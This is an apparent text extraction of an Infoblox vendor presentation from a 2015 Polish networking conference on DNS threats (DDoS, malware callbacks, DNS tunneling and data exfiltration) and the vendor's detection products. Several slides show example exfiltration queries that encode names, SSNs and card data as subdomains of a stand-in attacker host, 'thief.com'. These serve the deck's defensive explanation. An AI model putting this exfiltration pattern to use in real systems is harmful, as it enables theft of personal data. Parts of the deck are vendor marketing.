20150928-plnog15___dns-to-zlo-public

1 | © 2013 Infoblox Inc. All Rights Reserved. 1 | © 2015 Infoblox Inc. All Rights Reserved. CONFIDENTIAL

DNS źródłem całego zła w sieci.Czyli jak zostać superbohaterem twoich użytkownikówAdam Obszyński, [email protected]

mailto:[email protected]


Why Securing DNS is Critical

Unprotected, DNS increases risk to critical infrastructure and data

#1 protocol for volumetric reflection/

amplification attacks

DNS is critical networking

infrastructure

DNS protocol is easy to exploit and

attacks are prevalent

Traditional security is ineffective against

evolving threats


• One of the fastest growing attack vectors• Easy-to-exploit protocol• Firewalls and IDS/IPS devices not focused

on DNS threats• Proliferation of BYOD devices and mobile

users, meaning threats may be inside the firewall

• DNS security layer needed to complement existing security solutions

DNS Security Gap


DNS Security Challenges

Stopping APTs/malware from using DNS2

Defending against DNS DDoS attacks1

Preventing data exfiltration via DNS3


DNS Protection is Not Only About DDoS

Volumetric/DDoS Attacks DNS-specific Exploits

DNS reflection

DNS amplification

TCP/UDP/ICMP floods

NXDOMAIN attack

Phantom domain attack

Random subdomain attack

Domain lockup attack

DNS-based exploits

DNS cache poisoning

DNS tunneling

Protocol anomalies

Reconnaissance

DNS hijacking

Domain lockup attack


• Malicious traffic is visible on 100% of corporate networks1

• Every minute a host accesses a malicious website1

• The question isn’t if, but when you will be attacked, and how effectively you can respond

• APTs rely on DNS at various stages of the cyber kill chain to infect devices, propagate malware, and exfiltrate data

APTs: The New Threat Landscape

Source: 1 Cisco 2014 Annual Security Report

Organized and well funded

Profile organizations using public data/social media

Target key POI’s via spear phishing

“Watering hole” target groups on trusted sites

Leverage tried and truetechniques like SQLi, DDoS & XSS

Coordinated attacks, distract big, strike precisely

Operationalsophistication


CryptoLocker• Targets Windows-based computers in form of email attachment• Upon infection, encrypts files on local hard drive and mapped

network drives • If ransom isn’t paid, encryption key deleted and data

irretrievable

Gameover Zeus (GOZ)• 500,000 – 1M infections globally and100s of millions of dollars

stolen• Uses P2P communication to control infected devices or botnet• Takes control of private online transactions and diverts funds to

criminal accounts

Malware Examples


• Uses DNS as a covert communication channel to bypass firewalls

• Attacker tunnels other protocols like SSH, TCP, or web within DNS

• Enables attackers to easily pass stolen data or tunnel IP traffic without detection

• A DNS tunnel can be used as a full remote-control channel for a compromised internal host

Impact:• Data exfiltration or malware insertion can happen

through the tunnel

DNS Tunneling

Encoded IP in DNS queries

INTERNET

ENTERPRISE

Client-side tunnel program

DNS terminal server

IP traffic

Internet


Malware Steals File Containing Sensitive DataData Exfiltration over DNS Queries

• Infected endpoint gets access to file containing sensitive data

• It encrypts and converts info into encoded format

• Text broken into chunks and sent via DNS using hostname.subdomain or TXT records

• Exfiltrated data reconstructed at the other end• Can use spoofed addresses to avoid detection

INTERNET

ENTERPRISE

NameMarySmith.foo.thief.comMRN100045429886.foo.thief.comDOB10191952.foo.thief.com

NameMarySmith.foo.thief.comMRN100045429886.foo.thief.comDOB10191952.foo.thief.com

Infected endpoint

DNS server

Attacker controller server- thief.com

(C&C)

DataC&C commands


How Infoblox Secures DNS


Dedicated hardware with no unnecessary logical or physical ports

No OS-level user accounts—only admin accts Immediate updates to new security threatsSecure HTTPS-based access to device managementNo SSH or root-shell access Encrypted device-to-device communicationHardware based Security & DNS Acceleration

• Many open ports are subject to attack.• Users have OS-level account privileges on

server.• Requires time-consuming manual updates.

Conventional Server ApproachHardened Appliance Approach

Multiple Open Ports

Limited Port Access

Update ServiceSecure

Access

Hardened DNS Appliances


Internal DNS Security Deployment

INTERNET

ENTERPRISE

Infoblox Automated Threat Intelligence Service

Firewall

Infoblox Internal DNS Security

x

xxxx

Attacker Thief Badsite1.comGood.com

Badsite1.comBadsite2.comBadsite3.com

SSN:123456789.foo.thief.comPESEL:77050502143.foo.thief.com

Updates for DNS attacks and malicious domains

Legitimate Query DNS DDoS attacks detected and dropped

Data exfiltration detected and dropped

Malware site blocked


DNS reflectionDNS amplification

TCP/UDP/ICMP floodsNXDOMAIN attack

Phantom domain attack

Random subdomain attack

Domain lockup attackDNS-based exploits

DNS cache poisoningDNS tunneling

Malformed DHCP requests

Protection Against Internal DNS Attacks

Infoblox InternalDNS Security

DNS attacksdetected & dropped

Legi

timat

e Tr

affic

DN

S D

DoS

Legi

timat

e Tr

affic

DN

S T

unne

ling

x x

Firewall

Infoblox Automated Threat Intelligence

Service

INTERNET

ENTERPRISE


Protection Against APTs/MalwareDNS Firewall

An infected device brought into the office. Malware spreads to other devices on network.1Malware makes a DNS query to find “home” (botnet / C&C). DNS Firewall looks at the DNS response and takes admin-defined action (disallows communication to malware site or redirects traffic to a landing page or “walled garden” site).

2 Pinpoint. Infoblox Reporting lists DNS Firewall action as well as the:

• Device IP address• Device MAC address• Device type/OS (DHCP fingerprint)• Device host name• Device lease history• AD login name• Switch/port/VLAN

3 An update will occur every 2 hours (or more often for significant threat).4

Malware/APT

Malicious Domains

Infoblox threat update deviceIPs, Domains, ect. of Bad Servers

Blocked communication attempt sent to SyslogMalware/APT spreads within

network; calls home

INTERNET

INTRANET


Automatic and Customizable Threat IntelligenceDNS Firewall

Malware droppers

Botnet C&C/DNS servers

Geographic blocks

Malware droppers

Infoblox DNS Firewall

Pre-defined Lists

Inbound attacks

User-defined Lists

User-defined RPZ behaviors

Custom Feed

Custom Feed

• Automatic ongoing protection against APTs/malware without intervention, downtime or patching

• Choose from lists of threat categories and sources

• Implement whitelists, blacklists, and RPZ actions based on client

• Benefits: flexibility and performance


What is DNS data exfiltration?

• Tunneling is the mechanism by which attackers ex-filtrate data• Tunneling also used to bypass wifi hotspots and to do anti-virus

updates

DNS Tunneling vs DNS Ex-filtration

• Hackers know that DNS port is always open and available• Stolen data is broken into small chunks, often encrypted and encoded

to avoid detection• Exfiltrated data is decrypted and reassembled at the other end

Malware frequently uses DNS to ex-filtrate data

• DLP products protect against leakage via email, web, ftp and other vectors

• We cover one use case – one that these products typically don’t – but not the whole market

This detection IS NOT a substitute for Data Loss Protection products

Jane-Doe.foo.thief.comSSN-543112197.foo.thief.comDOB-04-10-1999.foo.thief.comMC-7895206822348781.foo.thief.comCCV-567-E-10-21.foo.thief.comJohn-Public.bar.thief.comSSN-9845762093.bar.thief.comDOB-01-22-1943.bar.thief.comV-3850384711230911.bar.thief.comCCV-434-E-11-19.bar.theif.com

Data Exfiltration via host/subdomainSimplified/unencrypted example

Example Malware that uses DNS TunnelsFrameworkPOSFeederBotMotoMortoPlugXWin32.Zbot.chas/Unruy.HWin32.Mufanom.vhaWin32.AutoTsifiri.nWin32.Hiloti


Data Exfiltration via DNS Tunneling• Real Customer Example

• File containing sensitive info converted to text, broken into chunks and exfiltrated via DNS

• Exfiltrated data put back together and decrypted to get the valuable information

• Used spoofed addresses


Data Exfiltration Protection with Infoblox DNS Threat Analytics


• DNS Threat Analytics detects tunneling based on the patterns of requests. S Looks at TXT records, A, AAAA recordsS Finds tunneling by using lexical and

temporal analysis looking for signs that the requests are data exfiltration

S Adds destinations to an internal RPZ feed automatically

• Products: Internal DNS Security/DNS FW

How DNS Threat Analytics Work

Note: DNS based detection IS NOT a substitute for Data Loss Protection products.

Analysis Model

Entropy

Lexically

N-GramFrequency

Size


BehaviorInfoblox analytics

Entropy Lexically

N-Gram Time Series

Generally speaking queries should not all be uniform in size

Contiguous sequence of

n-items

Number of queries (overall) number

of Queries to a domain

Are they words?


Intelligence Needed to Take ActionContextual Reporting

• Attack details by category, member, rule, severity, and time• Drill-down analytics and visualization of entire network• List of top infected clients with associated user names (enabled by Microsoft AD integration)• CISO/Executive report with top APT/malware threats


Integrations – Cisco, FireEye, Bit9 etc.Only Team wins!


Security Product Strategy

INTERNET

INTRANET

DN

S D

DoS

Global Threat Intelligence PlatformMalicious Domains

Infoblox Internal DNS Security & DNS Firewall

Infoblox External DNS Security

Harden DNS Anti-Malware & Data Exfiltration

Security Operations & Ecosystem

Expl

oits

Ref

lect

ion

Am

plifi

catio

n

SaaS/Cloud

DDOS

NAC

APT/Malware

SEIM

Business Intelligence

Infoblox DDI

Security


Find DNS Threats in your Network


Send Us Your PCAP Files

• Infoblox analyzes and provides insights on malicious activity in seconds

• Report on findings to take back to management


Q&A

20150928-plnog15___dns-to-zlo-public

Internet

Transcript of 20150928-plnog15___dns-to-zlo-public